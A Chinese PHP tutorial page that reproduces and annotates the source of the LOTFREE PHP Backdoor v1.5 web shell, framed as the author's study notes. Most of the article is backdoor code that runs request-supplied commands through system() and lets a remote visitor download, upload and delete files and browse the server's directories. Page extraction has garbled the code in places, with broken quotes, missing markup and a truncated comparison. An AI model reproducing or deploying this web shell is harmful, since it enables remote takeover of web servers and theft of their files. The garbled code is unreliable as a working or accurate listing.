解释PHP后门文件 -php教程-PHP中文网

首页

后端开发

php教程

解释PHP后门文件

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 25, 2016 am 09:13 AM

PHP Backdoor Version 1.5是由sirius_black / LOTFREE TEAM编写的一个php后门程序,这里对其进行一下简单解析,也当做自己学习php的笔记,该后门程序成执行的命令,取决于安装web服务器和php时用户的权限,如果是管理员的话,那就可以执行各种操作系统命令。

以下是一个后门程序的注释

function good_link($link)
{
$link=ereg_replace(“/+”,”/”,$link);
$link=ereg_replace(“/[^/(..)]+/\.\.”,”/”,$link);
$link=ereg_replace(“/+”,”/”,$link);
if(!strncmp($link,”./”,2) && strlen($link)>2)$link=substr($link,2);
if($link==”")$link=”.”;
return $link;
}
//$_REQUEST用来取得提交到本文件的数据
$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:”.”; //如果没有定义dir,dir取默认值”.”
$dir=good_link($dir);
$rep=opendir($dir); //打开dir指定的路径句柄
chdir($dir); //切换到dir指定的目录
if(isset($_REQUEST["down"]) &&$_REQUEST["down"]!=”") //如果定义了down
{
header(“Content-Type: application/octet-stream”);
header(“Content-Length: “.filesize($_REQUEST["down"]));
header(“Content-Disposition: attachment; filename=”.basename($_REQUEST["down"]));
readfile($_REQUEST["down"]); //将文件读取到缓冲区
exit();
}
?>
LOTFREE PHP Backdoor v1.5,易踪网yeetrack.com
echo “当前绝对路径为: ”.getcwd().”
\n”; //获取当前的绝对路径
echo “dir = ‘$dir’
\n”;
echo “当前目录,文件列表!

\n”;
//如果已经输入要执行的命令
if(isset($_REQUEST['cmd']) &&$_REQUEST['cmd']!=”")
{
echo “
```
\n”; 
```
登录后复制
system($_REQUEST['cmd']); //在服务器上执行输入的命令,执行结果回显
echo “\n”;
}
//如果已经上传了文件
if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"])) //获取post上来的文件,保存到当前目录
{
if($_FILES["fic"]["size"]
{
if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link(“./”.$_FILES["fic"]["name"]))) //将临时文件保存到当前目录
{
echo “文件保存成功 “.good_link(“./”.$_FILES["fic"]["name"]).”!
\n”;
}
else echo “文件上传失败: “.$_FILES["fic"]["error"].”
\n”;
}
else echo “File too large(文件超出大小限制)!
\n”;
}
if(isset($_REQUEST['rm']) &&$_REQUEST['rm']!=”") //如果定义了rm,即删除指定的文件
{
if(unlink($_REQUEST['rm'])) //unlink是php的删除文件函数
echo “成功删除 “.$_REQUEST['rm'].”!
\n”;
else echo “删除文件失败
\n”;
}
?>

$t_dir=array();

$t_file=array();

$i_dir=0;

$i_file=0;

//循环输读取前的目录文件,放在t_dir和t_file中

while($x=readdir($rep))

{

if(is_dir($x)) //如果当前处理的是目录

$t_dir[$i_dir++]=$x;

else //如果当前处理的是文件

$t_file[$i_file++]=$x;

}

closedir($rep); //关闭由opendir打开的目录句柄

while(1) //循环输入当前路径的目录和文件

{

//$_SERVER['PHP_SELF']取得当前php脚本文件名

if($y=each($t_file))

{

if($y["key"]%2==0) //如果当前处理的是key

echo ” bgcolor=’lightgreen’>\n”;

else //如果当前处理的是value,即文件。就将该文件展示出来,且提供下载链接。

echo “>\n”;

echo “ ”.$y["value"].”\n”;

}

else echo“>\n”;

if($y)

{

//如果是文件,就提供以下删除该文件的链接

if($y["key"]%2==0)echo ” bgcolor=’lightgreen’”;

echo “>Del”;

}

else echo “>\n”;

if(!$x && !$y)

break;

}

if($x=each($t_dir))

{

$name=$x["value"]; //获取t_dir数组里的目录名称

if($name==’.'){}

elseif($name==’..’) echo “ UP(父目录)

\n”; //展示一个UP链接,读取父目录的文件列表

else

echo “ ”.$name.”\n”;

}

?dir=”>revenirau repertoire d’origine
”>
Execute commande(执行操作系统命令)
上传文件到服务器当前目录:
”>

复制代码

本站声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

热AI工具

热工具

热门话题

gmail邮箱登陆入口在哪里

7446

CakePHP 教程

1374

steam的账户名称是什么格式

win11激活密钥永久

NYT连接提示和答案

显示更多

Related knowledge

PHP记录：PHP日志分析的最佳实践 Mar 10, 2025 pm 02:32 PM

PHP日志记录对于监视和调试Web应用程序以及捕获关键事件，错误和运行时行为至关重要。它为系统性能提供了宝贵的见解，有助于识别问题并支持更快的故障排除

在Laravel中使用Flash会话数据 Mar 12, 2025 pm 05:08 PM

Laravel使用其直观的闪存方法简化了处理临时会话数据。这非常适合在您的应用程序中显示简短的消息，警报或通知。默认情况下，数据仅针对后续请求： $请求 -

php中的卷曲：如何在REST API中使用PHP卷曲扩展 Mar 14, 2025 am 11:42 AM

PHP客户端URL（curl）扩展是开发人员的强大工具，可以与远程服务器和REST API无缝交互。通过利用Libcurl（备受尊敬的多协议文件传输库），PHP curl促进了有效的执行

简化的HTTP响应在Laravel测试中模拟了 Mar 12, 2025 pm 05:09 PM

Laravel 提供简洁的 HTTP 响应模拟语法，简化了 HTTP 交互测试。这种方法显着减少了代码冗余，同时使您的测试模拟更直观。基本实现提供了多种响应类型快捷方式： use Illuminate\Support\Facades\Http; Http::fake([ 'google.com' => 'Hello World', 'github.com' => ['foo' => 'bar'], 'forge.laravel.com' =>